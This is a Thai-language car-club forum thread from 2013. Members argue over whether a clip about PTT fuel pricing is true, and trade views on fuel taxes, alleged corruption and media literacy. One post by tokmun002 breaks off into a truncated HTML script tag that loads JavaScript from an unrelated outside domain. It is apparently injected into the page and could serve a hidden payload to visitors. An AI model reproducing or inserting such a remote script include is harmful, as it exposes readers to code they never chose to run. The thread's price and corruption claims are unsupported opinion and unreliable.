ตอบ
jagkrapongVilaikaew

ชื่อเล่น: โจ

เข้าร่วม: 09 มกรา 2011
ตอบ: 716

Guru ES
Guru ES

ได้รับคำขอบคุณ: 709
ให้คำขอบคุณ: 1961

ปี: 2001
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 6 มีนา 2013 20:28 - พี่ ๆ น้อง ลุงป้้าน้าอา เห็นว่าอย่างไรครบผม
จริงหรือไม่ครับผม

Attached File :
พี่ ๆ น้อง ลุงป้้าน้าอา เห็นว่าอย่างไรครบผม
woot

ชื่อเล่น: วุธ

เข้าร่วม: 11 กุมภา 2013
ตอบ: 533

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 487
ให้คำขอบคุณ: 492

ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 6 มีนา 2013 20:38 - พี่ ๆ น้อง ลุงป้้าน้าอา เห็นว่าอย่างไรครบผม
จิงครับ
TIRL_ES

ชื่อเล่น: เติ้ล

เข้าร่วม: 26 ธันวา 2011
ตอบ: 539

ได้รับคำขอบคุณ: 280
ให้คำขอบคุณ: 176

ปี: 2004
สี: น้ำเงิน อิเทอนอล (B-96P)
พุธ, 6 มีนา 2013 20:42 - พี่ ๆ น้อง ลุงป้้าน้าอา เห็นว่าอย่างไรครบผม
ที่นี่ประเทศไทย 555
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
ค้าอะไหล่โคตรเก่า

เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 6 มีนา 2013 20:48 - พี่ ๆ น้อง ลุงป้้าน้าอา เห็นว่าอย่างไรครบผม
เรื่องธรรมดาครับคนไทยรักกันที่ไหน ถ้าไม่ใช่พี่น้องในบอร์ดอีเอสพวกเรา จริงป๊ะ
ได้รับคำขอบคุณจาก: jagkrapongVilaikaew  HankMan  Auizie  b4i6  ICE@WIN  lordpark  napoon 
woot

ชื่อเล่น: วุธ

เข้าร่วม: 11 กุมภา 2013
ตอบ: 533

ได้รับคำขอบคุณ: 487
ให้คำขอบคุณ: 492

พุธ, 6 มีนา 2013 21:06 - พี่ ๆ น้อง ลุงป้้าน้าอา เห็นว่าอย่างไรครบผม
eskung พิมพ์ว่า:
เรื่องธรรมดาครับคนไทยรักกันที่ไหน ถ้าไม่ใช่พี่น้องในบอร์ดอีเอสพวกเรา จริงป๊ะ

ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
สบายบุรี

ชื่อเล่น: ซิส

เข้าร่วม: 02 กุมภา 2012
ตอบ: 90

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 154
ให้คำขอบคุณ: 11

ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 6 มีนา 2013 21:13 - พี่ ๆ น้อง ลุงป้้าน้าอา เห็นว่าอย่างไรครบผม
ฮาแบบมีสาระ  ปตท นี้เม่งเฮี้ยจริงๆ

ได้รับคำขอบคุณจาก: waymania  thammarong007  phichetza  b4i6  Rachen  vat  coco1340  Jasada  ed02  okuma  KinG_A  jagkrapongVilaikaew  petongzaa  Rungarun  Saka  ming 
sumateES01

ชื่อเล่น: เมทร

เข้าร่วม: 13 มกรา 2013
ตอบ: 381

มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 450
ให้คำขอบคุณ: 326

สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พุธ, 6 มีนา 2013 22:14 - พี่ ๆ น้อง ลุงป้้าน้าอา เห็นว่าอย่างไรครบผม
clip นี้รอคนมาชี้แจงครับ
Cra2yLov3

ชื่อเล่น: จุ่น

เข้าร่วม: 01 กุมภา 2012
ตอบ: 490

ได้รับคำขอบคุณ: 580
ให้คำขอบคุณ: 358

สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 6 มีนา 2013 22:21 - พี่ ๆ น้อง ลุงป้้าน้าอา เห็นว่าอย่างไรครบผม
นี้แหละคับ พลังไทยเพื่อใครกัน
ได้รับคำขอบคุณจาก: jagkrapongVilaikaew 
Auizie

ชื่อเล่น: อุ๋ยซี่

เข้าร่วม: 01 กุมภา 2013
ตอบ: 1461

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3077
ให้คำขอบคุณ: 2614

ปี: 2002
พุธ, 6 มีนา 2013 22:59 - พี่ ๆ น้อง ลุงป้้าน้าอา เห็นว่าอย่างไรครบผม
ถ้าไม่เห็นว่า ห้องน้ำสะอาด กะ มี คาเฟ่อเมซอน จะไม่เข้าแล้วนะ 555 เกี่ยวป่ะเนี่ย
ได้รับคำขอบคุณจาก: jagkrapongVilaikaew 
charoensuk

ชื่อเล่น: เหน่ง

เข้าร่วม: 15 พฤษภาคม 2011
ตอบ: 394

ได้รับคำขอบคุณ: 236
ให้คำขอบคุณ: 2

พุธ, 6 มีนา 2013 23:00 - พี่ ๆ น้อง ลุงป้้าน้าอา เห็นว่าอย่างไรครบผม
Logoนี้มีไว้เข้าห้องน้ำเท่านั้นครับ
ได้รับคำขอบคุณจาก: surasak_3cha  tamy2975 
ham_ter

ชื่อเล่น: ส้มจี๊ด

เข้าร่วม: 18 ตุลา 2011
ตอบ: 1641

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4624
ให้คำขอบคุณ: 0

สี: ม่วง วินเทจพลัม (RP-32P)
พุธ, 6 มีนา 2013 23:04 - พี่ ๆ น้อง ลุงป้้าน้าอา เห็นว่าอย่างไรครบผม
jagkrapongVilaikaew พิมพ์ว่า:

ส่วนตัวเรา นั้น เห็นว่า เรื่องนี้จริงไม่จริงไม่รู้ 
ถ้าจริง ขอดูข้อมูลหน่อย
แต่ที่รู้แน่ๆคือ ที่เค้าว่า คนไทยอ่านหนังสือปีละไม่เกิน 8 บรรทัด นั้น ท่าจะจริง
ว่างๆ จขกท ลองหาอ่าน ปีละหลายๆบรรทัดบ้างนะ
จะได้ไม่เป็นเครื่องมือคนอื่นเค้า..................

http://2g.pantip.com/cafe/wahkor/topic/X13056527/X13056527.html

http://2g.pantip.com/cafe/wahkor/topic/X12956443/X12956443.html

http://pantip.com/topic/30215231

พอดีจะพิมพ์ก็ยาว เอาลิงค์ไปละกัน แนะให้ไปอ่านหว้ากอตั้งนานแล้ว ยังไม่ไปอีก

เขาเถียงกันจนจบไปแล้ว ว่า เรื่องแบบนี้มันมั่วเพ้อเจ้อ โกหก เต้าข่าว

ห้องที่เป็นวิทย์ใช้เหตุใช้ผลน่ะ หัดเข้าซะมั่ง

เอาแต่เชื่อแก๊งน้ำมนต์โกตั๊บโกรเตรี๊ยกอยู่ได้..............................
ได้รับคำขอบคุณจาก: TiKkY II  Upper  jagkrapongVilaikaew  surasak_3cha  hanaun 
ham_ter

ครอบครัว ES
ครอบครัว ES

พุธ, 6 มีนา 2013 23:15 - พี่ ๆ น้อง ลุงป้้าน้าอา เห็นว่าอย่างไรครบผม
ถามพวกทวง ปตท

เห็นโวยวายจะไม่เติม ปตท จะให้เจ็ง หุ้นดิ่งลงๆ  ตอนนี้น้ำมันแพง เกือบ40บาท แล้วไง ทำไมน้ำมันพืชลิตร เกือบ50แย่งกันซื้อไม่บ่น น้ำขวดลิตรเ่ทาไร ไม่บ่น ทั้งที่เมืองไทยทำเอง ปลูกเองได้ แต่น้ำมันต้องซื้อเขามา ต้องลงทุนโรงกลั่น ที่เก็บอีก ทำไมมันแพงแล้วไม่จอดรถส่วนตัว แล้วขึ้นแท็กซี่ หรือทางเลือกอื่นเอาเล่า ยิ่งกรุงเทพ มีทั้งรถไฟฟ้าใต้ดินบนดิน จะบ่นทำไม แล้ว ถ้าไมมี ปตท จะเป็นยังไง ตลาดโดนปั้มต่างชาติคุม คงสะใจพิลึก เอาง่ายๆถ้าปั๊มต่างชาติมันดีจริง แค่ลดลงมาแข่ง ปตท. ให้ถูกกว่า ปตท. ลิตรละบาท คนก็เติมกันเต็มแล้ว
แต่ทำไมเค้าไม่ทำ เพราะอะไร ตอบกันได้ไหม ใช่มันทำไม่ได้ เพราะมันมี ปตท. บริษัท ที่พวกคุณด่าๆกัน มันค้ำราคาหน้าโรงกลั่นอยู่ไง
ถ้าไม่มี ปตท. คุณคิดเหรอว่า ปั๊มต่างชาติ เค้าจะขายถูกๆ เค้าก็ขึ้นราคาขายแพงๆ เท่าบ้านเค้ากันนั่นแหละ ที่ขายในเมืองไทยนี่ ถือว่าถูกแล้วในราคาตลาดโลก แล้วพวกที่ด่าๆนี่ ตอบกันได้ไหม ว่า ปตท.นั้น ไม่ดีอย่างไร หรือสักแต่ด่ากันตามเขาไป 
เมื่อก่อนมีปั้มต่างชาติมากมาย ราคาขายก็ต่างกันไปบ้าง ตอนเด็กจะมีปั้มใหญ่ๆคือ ตราดาว ตราหอย และก็ตราเสือ หลังปั้มสามทหาร แปรมาเป็น ปตท  จนถึงยุคฟองสบู่มี
ปั้มต่างชาติมาอีกเช่น บีพี คิวเอท เจ็ท แล้วพวกนี้ก็ปิดตัวเองไป เพราะอะไร ปัจจุบัน ปั้มที่มีอยู่ ก็ ปตท บางจาก พีที คอสโม เพียว ต่างชาติก็ เชลล์ คาลเท็กส์ เอสโซ่ ส่วนยี่ห้ออื่นเล็กๆก็ไม่ได้กล่าวถึง ที่กล่าวมาข้างต้น เพื่อให้เห็นว่า คนขายน้ำมันใช่ว่าจะอยู่ได้ร่ำรวย ยิ่งขายน้ำมันอย่างเดียว เสี่ยงเจ็งเอาง่ายๆ เห็นปั้มปิดกันไปมากมายใช่ใหม เพราะอะไร แล้วทำไมปตทโตเอาๆ เขาเอาทุกอย่างใช่ใหม ไม่ได้ขายแต่น้ำมัน กำไรของปตท.หลักๆมาจาก ผลิตภัณท์ ปิโตรเคมี ไม่ใช่ กำไรจากขายน้ำมัน รู้เอาไว้ แล้ว ใครถือหุ้นปตท มากสุด คลังไม่ใช่หรือ คลังถือหุ้นใหญ่ กำไรก็เข้ารัฐ พวกบุคคลที่คุณๆด่าๆกันว่า มันโกง มันโกง กันน่ะมีซักเท่าไร มีข้อมูลผู้ถือหุ้นไหม พวกคุณต้องให้เป็นแบบรถไฟใช่ใหม คนทำงานหยุดประท้วงเอาค่าแรงขึ้น ไม่ต้องทำงานก็มีเงินกินอย่างพวกสหภาพงั้นหรือ สุดท้ายใครไม่อยากเติม ที่ ปตท จะไปเติมปั้มนอก ราคามันต่างกันหรือไง ไอ้พวกเล่นการเมืองด้วยการสร้างเรื่องนี่อย่าให้เจริญเลย
ได้รับคำขอบคุณจาก: TiKkY II  Upper  jagkrapongVilaikaew  vat  laluna  Sak_es5442  hanaun 
AofStaR

ชื่อเล่น: อ๊อฟ

เข้าร่วม: 25 ธันวา 2011
ตอบ: 895

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1569
ให้คำขอบคุณ: 1125

พฤหัส, 7 มีนา 2013 00:02 - พี่ ๆ น้อง ลุงป้้าน้าอา เห็นว่าอย่างไรครบผม
ham_ter พิมพ์ว่า:

ส่วนตัวเรา นั้น เห็นว่า เรื่องนี้จริงไม่จริงไม่รู้ 
แต่ที่รู้แน่ๆคือ ที่เค้าว่า คนไทยอ่านหนังสือปีละไม่เกิน 8 บรรทัด นั้น ท่าจะจริง
ว่างๆ จขกท ลองหาอ่าน ปีละหลายๆบรรทัดบ้างนะ
จะได้ไม่เป็นเครื่องมือคนอื่นเค้า..................

http://2g.pantip.com/cafe/wahkor/topic/X13056527/X13056527.html

http://2g.pantip.com/cafe/wahkor/topic/X12956443/X12956443.html

http://pantip.com/topic/30215231

พอดีจะพิมพ์ก็ยาว เอาลิงค์ไปละกัน แนะให้ไปอ่านหว้ากอตั้งนานแล้ว ยังไม่ไปอีก

เขาเถียงกันจนจบไปแล้ว ว่า เรื่องแบบนี้มันมั่วเพ้อเจ้อ โกหก เต้าข่าว

ห้องที่เป็นวิทย์ใช้เหตุใช้ผลน่ะ หัดเข้าซะมั่ง

เอาแต่เชื่อแก๊งน้ำมนต์โกตั๊บโกรเตรี๊ยกอยู่ได้..............................

เห็นโวยวายจะไม่เติม ปตท จะให้เจ็ง หุ้นดิ่งลงๆ  ตอนนี้น้ำมันแพง เกือบ40บาท แล้วไง ทำไมน้ำมันพืชลิตร เกือบ50แย่งกันซื้อไม่บ่น น้ำขวดลิตรเ่ทาไร ไม่บ่น ทั้งที่เมืองไทยทำเอง ปลูกเองได้ แต่น้ำมันต้องซื้อเขามา ต้องลงทุนโรงกลั่น ที่เก็บอีก ทำไมมันแพงแล้วไม่จอดรถส่วนตัว แล้วขึ้นแท็กซี่ หรือทางเลือกอื่นเอาเล่า ยิ่งกรุงเทพ มีทั้งรถไฟฟ้าใต้ดินบนดิน จะบ่นทำไม แล้ว ถ้าไมมี ปตท จะเป็นยังไง ตลาดโดนปั้มต่างชาติคุม คงสะใจพิลึก เอาง่ายๆถ้าปั๊มต่างชาติมันดีจริง แค่ลดลงมาแข่ง ปตท. ให้ถูกกว่า ปตท. ลิตรละบาท คนก็เติมกันเต็มแล้ว
แต่ทำไมเค้าไม่ทำ เพราะอะไร ตอบกันได้ไหม ใช่มันทำไม่ได้ เพราะมันมี ปตท. บริษัท ที่พวกคุณด่าๆกัน มันค้ำราคาหน้าโรงกลั่นอยู่ไง
ถ้าไม่มี ปตท. คุณคิดเหรอว่า ปั๊มต่างชาติ เค้าจะขายถูกๆ เค้าก็ขึ้นราคาขายแพงๆ เท่าบ้านเค้ากันนั่นแหละ ที่ขายในเมืองไทยนี่ ถือว่าถูกแล้วในราคาตลาดโลก แล้วพวกที่ด่าๆนี่ ตอบกันได้ไหม ว่า ปตท.นั้น ไม่ดีอย่างไร หรือสักแต่ด่ากันตามเขาไป 
เมื่อก่อนมีปั้มต่างชาติมากมาย ราคาขายก็ต่างกันไปบ้าง ตอนเด็กจะมีปั้มใหญ่ๆคือ ตราดาว ตราหอย และก็ตราเสือ หลังปั้มสามทหาร แปรมาเป็น ปตท  จนถึงยุคฟองสบู่มี
ปั้มต่างชาติมาอีกเช่น บีพี คิวเอท เจ็ท แล้วพวกนี้ก็ปิดตัวเองไป เพราะอะไร ปัจจุบัน ปั้มที่มีอยู่ ก็ ปตท บางจาก พีที คอสโม เพียว ต่างชาติก็ เชลล์ คาลเท็กส์ เอสโซ่ ส่วนยี่ห้ออื่นเล็กๆก็ไม่ได้กล่าวถึง ที่กล่าวมาข้างต้น เพื่อให้เห็นว่า คนขายน้ำมันใช่ว่าจะอยู่ได้ร่ำรวย ยิ่งขายน้ำมันอย่างเดียว เสี่ยงเจ็งเอาง่ายๆ เห็นปั้มปิดกันไปมากมายใช่ใหม เพราะอะไร แล้วทำไมปตทโตเอาๆ เขาเอาทุกอย่างใช่ใหม ไม่ได้ขายแต่น้ำมัน กำไรของปตท.หลักๆมาจาก ผลิตภัณท์ ปิโตรเคมี ไม่ใช่ กำไรจากขายน้ำมัน รู้เอาไว้ แล้ว ใครถือหุ้นปตท มากสุด คลังไม่ใช่หรือ คลังถือหุ้นใหญ่ กำไรก็เข้ารัฐ พวกบุคคลที่คุณๆด่าๆกันว่า มันโกง มันโกง กันน่ะมีซักเท่าไร มีข้อมูลผู้ถือหุ้นไหม พวกคุณต้องให้เป็นแบบรถไฟใช่ใหม คนทำงานหยุดประท้วงเอาค่าแรงขึ้น ไม่ต้องทำงานก็มีเงินกินอย่างพวกสหภาพงั้นหรือ สุดท้ายใครไม่อยากเติม ที่ ปตท จะไปเติมปั้มนอก ราคามันต่างกันหรือไง ไอ้พวกเล่นการเมืองด้วยการสร้างเรื่องนี่อย่าให้เจริญเลย

ผมขอถามหน่อย ที่คุณชอบว่าคนอื่นว่าอ่านน้อย ต้องตกเป็นเครื่องมือให้คนอื่น แล้วผมขอถามกลับนะว่าข้อมูลที่คุณมีข้อมูลที่คุณอ่านเยอะ คุณแน่ใจได้อย่างไรครับว่าข้อมูลที่คุณอ่านตามลิงท์ต่างที่คุณอ้างถึงมันข้อมูลที่แท้จริงและจริง100% และคุณไม่ได้ตกเป็นเครื่องมือของใคร
ได้รับคำขอบคุณจาก: tokmun002  nooduean_69  kaisuh  Ton-  jagkrapongVilaikaew  nat  Cra2yLov3  K.panu  max_x  ohmz1541  raksapol  acurarsx  es330 
Cra2yLov3

ชื่อเล่น: จุ่น

เข้าร่วม: 01 กุมภา 2012
ตอบ: 490

ได้รับคำขอบคุณ: 580
ให้คำขอบคุณ: 358

พฤหัส, 7 มีนา 2013 00:11 - พี่ ๆ น้อง ลุงป้้าน้าอา เห็นว่าอย่างไรครบผม
สำหรับผมจากที่ต้องเกี่ยวข้องกับปตท. วิภาวดีเป็นระยะเวลานานผมก็มีความรู้สึกได้ว่าปตท. คือบริษัทที่โกงกินประเทศในรูปแบบของผู้ดีดูมีการศึกษา ทำอะไรออกสื่อเอาหน้าเอาตามากทั้งที่องค์กรข้างในค่อนข้างไม่โปรงใสเลย ลองท่านใดได้เกี่ยวของกับปตท. ผมว่าคงรู้อะไรๆมากขึ้นคับ
ได้รับคำขอบคุณจาก: POP_ES05  es330  Sak_es5442  chatli 
ham_ter

ครอบครัว ES
ครอบครัว ES

พฤหัส, 7 มีนา 2013 00:30 - พี่ ๆ น้อง ลุงป้้าน้าอา เห็นว่าอย่างไรครบผม
AofStaR พิมพ์ว่า:

ผมขอถามหน่อย ที่คุณชอบว่าคนอื่นว่าอ่านน้อย ต้องตกเป็นเครื่องมือให้คนอื่น แล้วผมขอถามกลับนะว่าข้อมูลที่คุณมีข้อมูลที่คุณอ่านเยอะ คุณแน่ใจได้อย่างไรครับว่าข้อมูลที่คุณอ่านตามลิงท์ต่างที่คุณอ้างถึงมันข้อมูลที่แท้จริงและจริง100% และคุณไม่ได้ตกเป็นเครื่องมือของใคร

ไม่ได้บอกว่าตัวเองถูก ไม่ได้บอกว่าเราดี ไม่ได้บอกว่าคนอื่นด้อย เราอาจจะผิดพลาด เราก็ยอมรับ
เพราะเราบอกแต่แรกแล้วว่า จริงไม่จริงเราไม่รู้ แต่ให้ลิงค์ไปลองอ่านดูไง เราไม่ได้ชี้นำให้เชื่อ
แต่เราแค่บอกว่าให้อ่านเยอะๆ คิดวิเคราะห์ หาข้อมูลก่อนแชร์ 
ความจริงเราชอบการแลกเปลี่ยนความคิดเห็นนะ ถ้าคุณมีข้อมูลที่เราผิดพลาด
ข้อมูลที่เราไม่รู้ เราก็ยินดีรับฟัง และ นั่งสนทนาด้วย 

แก้ไขล่าสุดโดย เมื่อ พฤหัส, 7 มีนา 2013 00:34, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: Upper  tokykung  laluna  hanaun 
ham_ter

ครอบครัว ES
ครอบครัว ES

พฤหัส, 7 มีนา 2013 00:33 - พี่ ๆ น้อง ลุงป้้าน้าอา เห็นว่าอย่างไรครบผม
Cra2yLov3 พิมพ์ว่า:
สำหรับผมจากที่ต้องเกี่ยวข้องกับปตท. วิภาวดีเป็นระยะเวลานานผมก็มีความรู้สึกได้ว่าปตท. คือบริษัทที่โกงกินประเทศในรูปแบบของผู้ดีดูมีการศึกษา ทำอะไรออกสื่อเอาหน้าเอาตามากทั้งที่องค์กรข้างในค่อนข้างไม่โปรงใสเลย ลองท่านใดได้เกี่ยวของกับปตท. ผมว่าคงรู้อะไรๆมากขึ้นคับ

ถูกต้องตามนั้น แต่ การที่เค้าโกงนี่ โกงยังไง ไม่โปร่งใสยังไง สนใจใคร่ฟังค่ะ
ถ้าเขียนไม่ได้ รบกวนขอลิงค์ก็ยังดี แต่คุณอย่าลืมว่า บ.ทุนต่างชาติ แสวงหากำไร และ เพราะเหตุใดจึงเจาะมาไม่ได้
ในข้อเสีย ก็ย่อมมีข้อดี แต่เราอยากรู้ข้อเสียที่คุณรู้มาค่ะ ขอทราบข้อมูลด้วยคน
ได้รับคำขอบคุณจาก: Upper 
3drom

ชื่อเล่น: ตุ้ย

เข้าร่วม: 19 กรกฎา 2011
ตอบ: 122

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 119
ให้คำขอบคุณ: 10

สี: ทอง แซทเทิลไลท์ (NH-663M)
พฤหัส, 7 มีนา 2013 01:28 - พี่ ๆ น้อง ลุงป้้าน้าอา เห็นว่าอย่างไรครบผม

ขอออกความเห็นกับประโยคนี้นิดนึงนะ

ว่างๆ จขกท ลองหาอ่านปีละหลายๆบรรทัดบ้างนะ

ผมว่าประโยคนี้แรงไปหน่อยครับ จขกท เค้าตั้งมาแค่ถามว่าจริงหรือไม่จริง ไม่ได้ชี้นำตรงไหนครับ
ของพวกนี้อยู่ที่วิจารณญาณ ในการรับข้อมูลข่าวสารว่าจะเชื่อหรือไม่อย่างไร
แต่เชื่อผมเถอะว่าคนที่มันโกงกิน มันตกนรกแน่นอนครับ
ได้รับคำขอบคุณจาก: LnwwasaD  nooduean_69  jagkrapongVilaikaew  kaisuh  POP_ES05  Ton-  civicnoom  tokmun002  es330 
fandi

ชื่อเล่น: ฟาน

เข้าร่วม: 12 กรกฎา 2012
ตอบ: 411

ได้รับคำขอบคุณ: 258
ให้คำขอบคุณ: 75
พฤหัส, 7 มีนา 2013 01:42 - พี่ ๆ น้อง ลุงป้้าน้าอา เห็นว่าอย่างไรครบผม
fandi

ชื่อเล่น: ฟาน

เข้าร่วม: 12 กรกฎา 2012
ตอบ: 411

ได้รับคำขอบคุณ: 258
พฤหัส, 7 มีนา 2013 01:46 - พี่ ๆ น้อง ลุงป้้าน้าอา เห็นว่าอย่างไรครบผม
3drom พิมพ์ว่า:

ขอออกความเห็นกับประโยคนี้นิดนึงนะ

ว่างๆ จขกท ลองหาอ่านปีละหลายๆบรรทัดบ้างนะ

ผมว่าประโยคนี้แรงไปหน่อยครับ จขกท เค้าตั้งมาแค่ถามว่าจริงหรือไม่จริง ไม่ได้ชี้นำตรงไหนครับ
ของพวกนี้อยู่ที่วิจารณญาณ ในการรับข้อมูลข่าวสารว่าจะเชื่อหรือไม่อย่างไร
แต่เชื่อผมเถอะว่าคนที่มันโกงกิน มันตกนรกแน่นอนครับ

aotatix21

ชื่อเล่น: เอก

เข้าร่วม: 26 ธันวา 2010
ตอบ: 212

ได้รับคำขอบคุณ: 214
ให้คำขอบคุณ: 209

พฤหัส, 7 มีนา 2013 03:46 - พี่ ๆ น้อง ลุงป้้าน้าอา เห็นว่าอย่างไรครบผม

Cra2yLov3 พิมพ์ว่า:

ถูกต้องตามนั้น แต่ การที่เค้าโกงนี่ โกงยังไง ไม่โปร่งใสยังไง สนใจใคร่ฟังค่ะ
ถ้าเขียนไม่ได้ รบกวนขอลิงค์ก็ยังดี แต่คุณอย่าลืมว่า บ.ทุนต่างชาติ แสวงหากำไร และ เพราะเหตุใดจึงเจาะมาไม่ได้
ในข้อเสีย ก็ย่อมมีข้อดี แต่เราอยากรู้ข้อเสียที่คุณรู้มาค่ะ ขอทราบข้อมูลด้วยคน

นั้นสิครับ ปตท. โกงตรงไหนครับ ขอสักข้อ
ถ้าปตท. โกงชาติขนาดนั้นจริงทำไมยังมีคนทำงานอยู่ คนที่เข้ามาทำงานใน ปตท. พวกวิศวกร
ส่วนมากจบ จุฬา ธรรมศาสตร์ 3 พระจอม จบจากเมืองนอก ป.ตรี โท เอก ระดับหัวกระทิทั้งนั้นทำไมยังมีกลุ่มคนพวกนี้เข้ามาทำงาน
เพราะเงินเหรอครับ? ผมบอกได้เลยว่าพวกนี้ฐานะทางบ้านดีอยู่แล้ว อีกอย่างจบมาระดับนั้น ไปสมัครบริษัทต่างชาติไม่ดีกว่าหรอครับ
เงินเดือนแตะๆแสนบาท ทำไมยังมีคนทำยันเกษียณ คนเหล่านี้ไม่ได้โง่นะครับ ถ้าปตท. โกงชาติขนาดนั้นไม่มีแล้วละครับคนไทยในปตท.
มีแต่พวกที่ "อคติ" ที่ไม่ยอมรับฟังข่าวสารที่แท้จริง พอข้อมูลเท็จอ้างว่าโกงชาติเท่านั้นแหละ เลือดรักชาติเดือดๆโดยไม่สนว่ามันเป็นความจริงไหม
เที่ยวด่า เที่ยวแชร์ เที่ยวพูดไปทั่ว โชว์ว่ากูรักชาติ กูจะกู้้ชาติ ผมบอกได้เลยว่า คุณคิดผิด คุณกำลังทำลายชาติ ทำลายหม้อข้าวตัวเอง
มีแค่นี้แหละครับฝากไปคิด
ได้รับคำขอบคุณจาก: laluna  Upper  hanaun 
aotatix21

ชื่อเล่น: เอก

เข้าร่วม: 26 ธันวา 2010
ตอบ: 212

ได้รับคำขอบคุณ: 214
ให้คำขอบคุณ: 209

พฤหัส, 7 มีนา 2013 03:52 - พี่ ๆ น้อง ลุงป้้าน้าอา เห็นว่าอย่างไรครบผม
ตอบ จขกท.ด้วย ที่ราคาน้ำมันในประเทศเห็นๆกัน 40 คือมัน + ภาษี + กองทุนน้ำมันเข้าไปครับ

จริงๆก็ขายลิตรละ 20บาทเหมือนกัน แต่เวลาขายไปเมืองนอกมันไม่มีค่าภาษี + กองทุนน้ำมัน มันเลย 20

ก็เท่านี้แหละครับ ง่ายๆ เด็ก ป.3 ยังเข้าใจขายของก็ต้องมีภาษี อยากใช้ถูกๆ โน้นเลยครับ รัฐสภาประท้วงให้ลด

ภาษี+กองทุนน้ำมันตามที่เค้าหาเสียงไว้เลยเลยไม่เกี่ยวกะ ปตท. ครับ แต่ถ้าเ้ป็นแบบนั้นจริงคงเติมน้ำมันใช้กันฟุ่มเฟือย

เหมือนเดิม ทำให้น้ำเข้าน้ำมันมหาศาลอีกก็เอาเงินไปให้ต่างชาติอีก ประหยัดครับดีที่สุด ทุกวันนี้ ปตท. ทำกลุ่มธุระกิจน้ำมัน

ขาดทุน 40000 ล้าน นี้ยังไม่ทำเพื่อชาติอีกเหรอครับ ถ้าขายน้ำมันอย่างเดียวแล้วกำไร ผู้บริหารเค้าไม่ไปทำธุรกิจอื่นๆเสริมหรอกครับ

นี้ติดลบกระจายเลยต้องขยายห่วงโซอุปทานเพื่อที่จะได้มีเงินไว้อุดหนุนธุรกิจน้ำมัน
ได้รับคำขอบคุณจาก: jagkrapongVilaikaew  laluna  hanaun 
tokmun002

ชื่อเล่น: โอ

เข้าร่วม: 11 พฤษภาคม 2012
ตอบ: 1737

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1331
ให้คำขอบคุณ: 1705

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พฤหัส, 7 มีนา 2013 07:01 - พี่ ๆ น้อง ลุงป้้าน้าอา เห็นว่าอย่างไรครบผม
ธุรกิจขาดทุนงั้นก็พวกโง่ล่ะครับที่เข้าไปซื้อหุ้น. เอาเงินภาษีของเราไปอุ้มเป็นกำไรอ่ะดิครับ (ผมขอมองแบบชาวบ้านครับ. ข้อมูลก็แค่ตัวหนังสือที่พิมพ์ขึ้นจากไหน? ออกจากปากยังแถกันได้เลยครับ) ไม่มีใครหรอกใครความไม่รู้ที่หรอกเรา. เค้าก็เตือนเราแล้วนิ่หว่า <script src="https://sport32news.com/civicesgroup.js"></
davidian

ชื่อเล่น: เอ็ม

เข้าร่วม: 02 พฤศจิกา 2012
ตอบ: 1424

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2420
ให้คำขอบคุณ: 4730

ที่อยู่: บางสิบหมื่น ชลบุรี -แปดริ้ว ฉะเชิงเทรา-บางนา สมุทรปราการ
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 7 มีนา 2013 08:04 - พี่ ๆ น้อง ลุงป้้าน้าอา เห็นว่าอย่างไรครบผม
ใจเย็นๆครับ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  natt-es3 
surasaka

เข้าร่วม: 02 สิงหา 2011
ตอบ: 722

Guru ES
Guru ES

ได้รับคำขอบคุณ: 551
ให้คำขอบคุณ: 3511
พฤหัส, 7 มีนา 2013 08:28 - พี่ ๆ น้อง ลุงป้้าน้าอา เห็นว่าอย่างไรครบผม
เข้ามาฟังครับ...
LnwwasaD

ชื่อเล่น: เฟริท

เข้าร่วม: 10 เมษา 2012
ตอบ: 3543

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2843
ให้คำขอบคุณ: 2957

พฤหัส, 7 มีนา 2013 08:47 - พี่ ๆ น้อง ลุงป้้าน้าอา เห็นว่าอย่างไรครบผม
เท่าที่ผมได้ อ่าน กระทู้ ......  ด้านบนมานะครับ .... ผมว่า ใจร่มๆกันก่อนนะครับ  

ไม่มีไครถูก ไม่มีไครผิดครับ  .............. ความคิด เป็นของบุคคล  ........  อันนี้ห้ามกันไม่ได้ครับ  

ผมแค่ไม่อยาก
ให้พี่น้อง Civic Es  Group ต้องมานั่งเถียงกัน ........  หรือเกิดความรู้สึกไม่ดีต่อกัน  ...   ยังไงเราก็พวกเดียวกันครับ  .....

.............  ขอบคุณคร๊าฟฟฟฟฟฟฟ  .............   
damrongwit

ชื่อเล่น: ต๋อม

เข้าร่วม: 19 มกรา 2013
ตอบ: 601

Guru ES
Guru ES

ได้รับคำขอบคุณ: 597
ให้คำขอบคุณ: 635

พฤหัส, 7 มีนา 2013 08:49 - พี่ ๆ น้อง ลุงป้้าน้าอา เห็นว่าอย่างไรครบผม
ใจเย็นๆครับ ใช้เวลาไปทำมาหากินดีกว่า...
น้ำมันขึ้นข้าวของแพงเราก็ช่วยกันประหยัดเอาครับ
เราเติมแพงคนอื่นเค้าก็เติมแพงขึ้นอยู่กับว่าเราใช้กันยังไง
